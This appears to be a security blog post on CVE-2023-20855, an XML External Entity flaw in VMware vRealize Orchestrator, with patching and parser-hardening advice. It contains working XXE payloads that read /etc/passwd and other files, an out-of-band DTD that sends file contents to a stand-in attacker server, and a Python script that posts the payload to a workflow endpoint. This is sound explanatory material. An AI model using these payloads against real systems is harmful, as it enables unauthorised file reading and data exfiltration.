TL;DR:  
A security vulnerability (CVE-2023-20855) was disclosed in VMware vRealize Orchestrator, allowing an attacker with non-administrative access to read sensitive information or potentially escalate privileges using a classic XML External Entity (XXE) attack. In this article, we’ll break down what happened, show how XXE works, and walk through an example exploit step by step.

What is CVE-2023-20855?

In February 2023, VMware published an advisory (VMSA-2023-0005) for a security hole in vRealize Orchestrator (vRO), a workflow automation tool. vRO’s XML parsing has restrictions meant to keep this class of input out, but the advisory describes specially crafted input from a non-administrative user that bypasses those restrictions.

Who’s at risk?  
If you run vRealize Orchestrator 8.x (or vRealize Automation 8.x or VMware Cloud Foundation 4.x, which bundle it) without the fix (8.11.1 for vRO; the advisory lists the patches for other 8.x releases), and you let non-administrative users submit workflow inputs, an attacker could use this flaw to read sensitive information from the appliance or potentially escalate privileges.

What’s an XXE Vulnerability?

An XML External Entity (XXE) attack abuses the way XML parsers handle a document’s DTD (Document Type Definition). A DTD can declare entities, and an entity can point at an external resource through a SYSTEM identifier. If the parser has not been configured to refuse DTDs or external entity resolution, an attacker who controls the XML can make the parser read local files or fetch URLs on the internal network and hand the result back as document content.

It’s a bit like letting a visitor into your house to use the bathroom and only later finding out that every door in the hallway, including the one to your safe, was unlocked.

The Heart of the Exploit

Suppose you have a vRO workflow that takes XML input (say, for automation tasks). Under the hood, the workflow engine parses the XML to build data objects. If that parser still processes the DOCTYPE and resolves external entities, an attacker can submit XML like this:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <info>&xxe;</info>
</data>

What happens?
When the XML is parsed, &xxe; is replaced with the contents of /etc/passwd (the local account list on a UNIX system), or of any other file the vRO service account can read. One caveat: the parser treats the fetched file as XML content, so a file containing an unescaped < or & causes a parse error instead of a leak. That is why plain text files such as /etc/passwd or /etc/hostname are the usual first test.

Now imagine what happens if the attacker asks for sensitive files: secret keys, credentials, or, since a SYSTEM identifier can also be an http:// URL, the cloud metadata endpoint reachable from the host.

Proof of Concept: Exploiting CVE-2023-20855

Here’s a basic walkthrough for testing the vulnerability (on your *own* safe lab, not in production!).

1. Send a Malicious Request

Assume you have workflow access with XML input (could be via API or UI).

Create a payload like

<?xml version="1.0"?>
<!DOCTYPE replace [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<input>
  <username>&xxe;</username>
</input>

Submit or inject the above XML.

- If the workflow’s response or logs echo the parsed input back, you should see the /etc/passwd contents appear where the username would be. If nothing is reflected, the file was still read by the parser; you just need an out-of-band channel to see it.

Alternatively, use a parameter entity and an attacker-hosted DTD to *exfiltrate* data out of band, which works even when nothing is reflected back to you. The payload only pulls in your DTD:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://YOUR-ATTACKER-SERVER:8080/evil.dtd">
  %remote;
]>
<test>&exfil;</test>

and the DTD you serve as evil.dtd does the real work (the target file must be a single line with no XML-special characters, which is why /etc/hostname is a good first pick):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY exfil SYSTEM 'http://YOUR-ATTACKER-SERVER:8080/?leak=%file;'>">
%wrap;

Spin up a web server in the directory holding evil.dtd (python3 -m http.server 8080) and watch its access log: the first hit fetches evil.dtd, and the second hit carries the file contents in the leak= query string. This variant needs the parser to load external DTDs and the appliance to have outbound HTTP access to you.

You can automate the XXE test using Python’s requests library (the endpoint below is a placeholder; point it at the workflow input you actually have access to in your lab):

import requests
import urllib3

# Lab appliance with a self-signed certificate; do not disable TLS verification anywhere else.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# No leading newline: the XML declaration must be the very first bytes of the document.
xml_payload = '''<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<data>
  <info>&xxe;</info>
</data>'''

# Placeholder URL: substitute the real vRO endpoint that accepts your XML input.
url = "https://vro-vulnerable-server/api/workflows/submit"
headers = {"Content-Type": "application/xml"}
r = requests.post(url, data=xml_payload, headers=headers, verify=False)
print(r.status_code)
print(r.text)  # look for the contents of /etc/hosts reflected in the response

*PS: Make sure you have legal authorization before testing anything!*

What Should You Do?

- Patch ASAP: Update vRealize Orchestrator (and vRealize Automation or Cloud Foundation, which bundle it) to a fixed release; VMware’s security advisory VMSA-2023-0005 lists the exact versions.
- Treat XML as hostile input: validate and restrict what gets parsed, and never hand user-supplied XML to a parser left at its default settings.
- Harden your parsers: disable DTD processing entirely where you can (for Java’s JAXP parsers, the http://apache.org/xml/features/disallow-doctype-decl feature); where DTDs are required, disable external general entities, external parameter entities and external DTD loading.
- Review workflow design: Don’t allow non-admins to create or run workflows that accept “raw” XML input unless you have confirmed how that XML is parsed.
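To make “the vulnerable setting beside the hardened one” concrete, here is an added example; it is mine, not code from this post or from VMware. vRO’s own parser is Java, and Python’s standard-library SAX (expat) parser stands in for it here because it has the same switch. The example writes a throwaway file holding a constructed secret, builds the same payload shape shown earlier against that file, and parses it twice: once with external general entity resolution turned on (the vulnerable configuration, which the explanation above describes) and once with it left at the stdlib default, which is the parser hardening the list above asks for. The secret value, the element names and the temporary file are all assumptions of the example.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers character data so we can see what &xxe; expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def build_payload(file_url):
    """Same XXE shape as the post's payload, pointed at an arbitrary file URL."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "{file_url}"> ]>\n'
        "<data><info>&xxe;</info></data>"
    ).encode()


def parse_untrusted(xml_bytes, resolve_external_entities):
    """Parse with the stdlib SAX (expat) parser.

    resolve_external_entities=True is the vulnerable configuration: the
    parser fetches whatever SYSTEM identifier the document names and
    splices the result into the document text.
    False (the stdlib default since Python 3.7.1) leaves the entity empty.
    """
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo(secret="s3cr3t-token-from-lab-file"):
    """Write a throwaway 'secret' file, then parse the payload both ways.

    The file is a constructed stand-in for a credential file on the
    appliance. Returns (what the vulnerable parser leaked,
                        what the hardened parser saw).
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        path = fh.name
    try:
        payload = build_payload(pathlib.Path(path).as_uri())  # file:///... URL
        leaked = parse_untrusted(payload, resolve_external_entities=True)
        blocked = parse_untrusted(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(blocked))
```

Running it prints the constructed secret from the first parse and an empty string from the second; the only difference between the two calls is one parser feature, which is exactly the kind of setting the vRO fix and the hardening advice above are about. In Java the equivalent switches are the JAXP features named in the list; in Python, the defusedxml package is the easier way to get the hardened behaviour across all of the stdlib parsers at once.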

Resources and References

- VMware vRealize Orchestrator Security Advisory (VMSA-2023-0005)
- Common XXE Attack Cheat Sheet (OWASP)
- XML External Entity (XXE) Attack explained on PortSwigger

In Conclusion

CVE-2023-20855 is a textbook reminder: If you’re taking in user XML anywhere in your environment, *assume* someone will try to break in through an XXE attack. This time, it was VMware’s high-profile automation suite, but the lesson applies everywhere.

Keep your software patched, keep XML locked down.

Stay alert—someone might be peeking at your secrets!


*This post is written for educational purposes. Always test responsibly and with proper authorization.*

Timeline

Published on: 02/22/2023 00:15:00 UTC
Last modified on: 03/03/2023 14:04:00 UTC